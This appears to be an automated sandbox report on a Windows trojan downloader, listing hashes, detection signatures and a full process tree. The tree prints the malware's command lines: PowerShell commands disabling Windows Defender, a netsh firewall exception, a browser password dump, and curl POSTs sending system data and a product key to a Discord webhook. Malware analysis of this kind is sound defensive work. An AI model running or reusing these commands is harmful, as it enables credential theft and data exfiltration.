Analysis

max time kernel: 151s
max time network: 153s
platform: windows10_x64
resource: win10v20201028
submitted: 21-03-2021 17:36

Static task: static1
Behavioral task: behavioral1
Sample: SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe
Resource: win7v20201028

General

Target: SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe
Size: 12.6MB
MD5: 897aabd3ac16050d62b8aacf85541454
SHA1: db2fd7fb1de3b602d7ba17da0d0b1ad4f6e552c9
SHA256: 1d2ca907c73941dfcd91aa2ef0b96ecc137146be0dfd654e52f9408100f8fbbb
SHA512: 10bc9fcb25e2991141fe279a7815c59f06b0213046f957b4637dcfd9c31473a7b7428db5844fe0f7a36c0320ca933f335d7edea5167d8960ad37e1f0860f200a
Malware Config
Signatures

Contains code to disable Windows Defender (1 IoC)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
  resource: behavioral2/files/0x0002000000015616-10.dat  yara_rule: disable_win_def

NirSoft WebBrowserPassView (2 IoCs)
Password recovery tool for various web browsers
  resource: behavioral2/files/0x000100000001aba0-384.dat  yara_rule: WebBrowserPassView
  resource: behavioral2/files/0x000100000001aba0-386.dat  yara_rule: WebBrowserPassView

Nirsoft (2 IoCs)
  resource: behavioral2/files/0x000100000001aba0-384.dat  yara_rule: Nirsoft
  resource: behavioral2/files/0x000100000001aba0-386.dat  yara_rule: Nirsoft

Executes dropped EXE (7 IoCs)
  pid 3404  Machos1.exe
  pid 184   System.exe
  pid 3472  curl.exe
  pid 3084  curl.exe
  pid 5076  WebBrowserPassView.exe
  pid 4132  curl.exe
  pid 3860  filed.exe

Modifies Windows Firewall (1 TTP)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 2 IoCs)
  Set value (str)  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\daa2ebaeb88e49d9128a4fc7e89de43f = "\"C:\\Windows\\System.exe\" .."  (process: System.exe)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\daa2ebaeb88e49d9128a4fc7e89de43f = "\"C:\\Windows\\System.exe\" .."  (process: System.exe)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 27  myexternalip.com
  flow 31  myexternalip.com

Drops file in Windows directory (3 IoCs)
  File created  C:\Windows\Disable.vbs   (process: SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe)
  File created  C:\Windows\Machos1.exe   (process: SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe)
  File created  C:\Windows\System.exe    (process: SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Delays execution with timeout.exe (1 IoC)
  pid 2276  timeout.exe

Gathers system information (1 TTP, 8 IoCs)
Runs systeminfo.exe.
  pid 4240  systeminfo.exe
  pid 588   systeminfo.exe
  pid 2100  systeminfo.exe
  pid 1704  systeminfo.exe
  pid 3312  systeminfo.exe
  pid 4440  systeminfo.exe
  pid 4588  systeminfo.exe
  pid 1184  systeminfo.exe

Modifies registry class (3 IoCs)
  Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings  (process: SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe)
  Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings  (process: Machos1.exe)
  Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings  (process: WScript.exe)

Suspicious behavior: EnumeratesProcesses (48 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes

Process tree, indented by depth; each node lists the image path, the command line as executed, the PID, and the signatures that fired for it.

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe"
  PID: 644
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\Disable.vbs"
    PID: 2924
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\SysWOW64\WScript.exe" "C:\Windows\Disable.vbs" /elevate
      PID: 1520
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
        PID: 388
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
        PID: 2116
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
        PID: 2240
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
        PID: 3940
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
        PID: 3956
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
        PID: 3160
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
        PID: 752
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
        PID: 4112
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
        PID: 1968
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
        PID: 2128
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
        PID: 1944
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\Machos1.exe
    Command line: "C:\Windows\Machos1.exe"
    PID: 3404
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"
      PID: 4900
      - Modifies registry class
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"
        PID: 756
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "
          PID: 4436
          - Suspicious use of WriteProcessMemory

          C:\temp\curl.exe
            Command line: C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Hey Machos. Extraction was successful.**\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC
            PID: 3472
            - Executes dropped EXE

          C:\temp\curl.exe
            Command line: C:/temp/curl "https://myexternalip.com/raw"
            PID: 3084
            - Executes dropped EXE

          C:\temp\WebBrowserPassView.exe
            Command line: C:/temp/WebBrowserPassView.exe /stext "C:/temp/Admin_Passwords.txt"
            PID: 5076
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 3312
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"Host Name"
            PID: 3668

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 4440
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"Domain"
            PID: 4860

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 4588
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"OS Name"
            PID: 4248

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 1184
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"OS Version"
            PID: 3156

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 4240
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"System Manufacturer"
            PID: 5056

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 588
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"System Model"
            PID: 4220

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 2100
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"System type"
            PID: 4576

          C:\Windows\system32\systeminfo.exe
            Command line: systeminfo
            PID: 1704
            - Gathers system information

          C:\Windows\system32\findstr.exe
            Command line: findstr /c:"Total Physical Memory"
            PID: 1680

          C:\Windows\System32\Wbem\WMIC.exe
            Command line: wmic diskdrive get size
            PID: 2268
            - Suspicious use of AdjustPrivilegeToken

          C:\Windows\System32\Wbem\WMIC.exe
            Command line: wmic bios get serialnumber
            PID: 3356

          C:\Windows\System32\Wbem\WMIC.exe
            Command line: wmic cpu get name
            PID: 2544

          C:\temp\curl.exe
            Command line: C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Admin**\n```asciidoc\nTime and Date :: Sun 03/21/2021 18:41:05.86\nIP Address :: 154.61.71.13\nWindows Info :: Product Name: Windows 10 Pro, Product ID: 00331-10000-00001-AA148, Installed Key: W269N-WFGWX-YVC9B-4J6C9-T83GX\n```\n\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC
            PID: 4132
            - Executes dropped EXE

          C:\temp\filed.exe
            Command line: "C:\temp\filed.exe" --processStart filed.exe
            PID: 3860
            - Executes dropped EXE

          C:\Windows\system32\timeout.exe
            Command line: timeout 5
            PID: 2276
            - Delays execution with timeout.exe

  C:\Windows\System.exe
    Command line: "C:\Windows\System.exe"
    PID: 184
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\netsh.exe
      Command line: netsh firewall add allowedprogram "C:\Windows\System.exe" "System.exe" ENABLE
      PID: 4760